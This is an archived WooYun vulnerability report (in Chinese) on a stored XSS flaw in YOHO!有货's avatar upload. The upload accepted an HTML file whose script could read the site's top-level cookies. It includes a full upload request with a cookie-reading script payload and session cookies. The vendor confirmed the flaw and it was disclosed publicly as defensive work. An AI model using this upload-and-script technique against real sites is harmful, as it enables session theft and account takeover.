当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138951

漏洞标题:YOHO!有货某缺陷导致XSS(可获取到关键cookie)

相关厂商:YOHO!有货

漏洞作者: c26

提交时间:2015-09-04 13:46

修复时间:2015-10-20 10:40

公开时间:2015-10-20 10:40

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-04: 细节已通知厂商并且等待厂商处理中
2015-09-05: 厂商已经确认,细节仅向厂商公开
2015-09-15: 细节向核心白帽子及相关领域专家公开
2015-09-25: 细节向普通白帽子公开
2015-10-05: 细节向实习白帽子公开
2015-10-20: 细节向公众公开

简要描述:

RT

详细说明:

头像上传可以上传任意文件 脚本不解析 但是可以获取到顶级域下的cookie,改成html可以造成一个xss
http://www.yoho.cn/passport/personal/setting


L)11(J(VONAN]KQ`@T9VWFO.png

漏洞证明:

POST / HTTP/1.1
Host: upfile.yoho.cn
Content-Length: 1009
Origin: http://www.yoho.cn
X-Requested-With: ShockwaveFlash/18.0.0.232
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Content-Type: multipart/form-data; boundary=----------ae0Ij5ae0Ij5GI3Ef1Ef1GI3Ij5ei4
Accept: */*
Referer: http://www.yoho.cn/passport/personal/setting
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: _yasv=174023428; PHPSESSID=n7k7mn8is6rr60rbo5q09hl843; yh_merge_new=21691082%2C014afaca94534a8b8219b6d68d3c75931258fd3e%2Cy%2C1441331390; Hm_cv_cba6f2719081a006e181cf17fa40ad05=1*login*1; _gat=1; __utmt=1; Hm_lvt_cba6f2719081a006e181cf17fa40ad05=1441327478; Hm_lpvt_cba6f2719081a006e181cf17fa40ad05=1441341531; _ga=GA1.2.913168703.1441327478; __utma=79162396.913168703.1441327478.1441338275.1441341447.4; __utmb=79162396.5.10.1441341447; __utmc=79162396; __utmz=79162396.1441327539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=79162396.|1=login=1=1
------------ae0Ij5ae0Ij5GI3Ef1Ef1GI3Ij5ei4
Content-Disposition: form-data; name="Filename"
xx.png
------------ae0Ij5ae0Ij5GI3Ef1Ef1GI3Ij5ei4
Content-Disposition: form-data; name="key"
0aadYKdam_iAu-A1dxKCwgmvtg3_9khlYhAM_x7GVknQpoBCCo_nvbIhajkgd2LXFNUgBxUwQ94PmD74DtsvNW9Hg2AZyFIFNz17RPQBLjIH_PPJjUdggy9z0zz-60fmJGTnaktKB6PKw055tCdUgxLsmaJpx1tx3rnxerxtzrcSILEqi7Jv4i1PvTePmlIUXYouxPe7-m9DWxh9INAEx78W0xEqWAyV6zlcbmtccbh69HWBlnACN_LQIUx-dH0balJqznYxmR1THfls-3yyhg-m70KKWtrDod1GKN45beYvZQZvJcYvlsxt1JUAsZn0db7EjQBSlFBMfAiLcj6DDHtfhrPmY1aE0BEZaJy-uRgsIOIrk23tNPgyUaA
------------ae0Ij5ae0Ij5GI3Ef1Ef1GI3Ij5ei4
Content-Disposition: form-data; name="format"
json
------------ae0Ij5ae0Ij5GI3Ef1Ef1GI3Ij5ei4
Content-Disposition: form-data; name="file"; filename="xx.html"
Content-Type: image/jpeg
<script>
alert(document.cookie);
</script>
------------ae0Ij5ae0Ij5GI3Ef1Ef1GI3Ij5ei4
Content-Disposition: form-data; name="Upload"
Submit Query
------------ae0Ij5ae0Ij5GI3Ef1Ef1GI3Ij5ei4--


http://img01.res.yoho.cn/headimg/2015/09/04/12/01f158383fe734394e384a1ebc25af5f36.html


`~N2}7)6PP4{Y}1RNUECO]A.jpg


FUFCNE(8ZAIY(8M~]PQF~1G.jpg


3K58N7}I0M0YS2K`D~E4NAX.jpg

修复方案:

你行

版权声明:转载请注明来源 c26@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-05 10:39

厂商回复:

感谢对我们的关注,我们马上处理

最新状态:

暂无

漏洞评价:

评论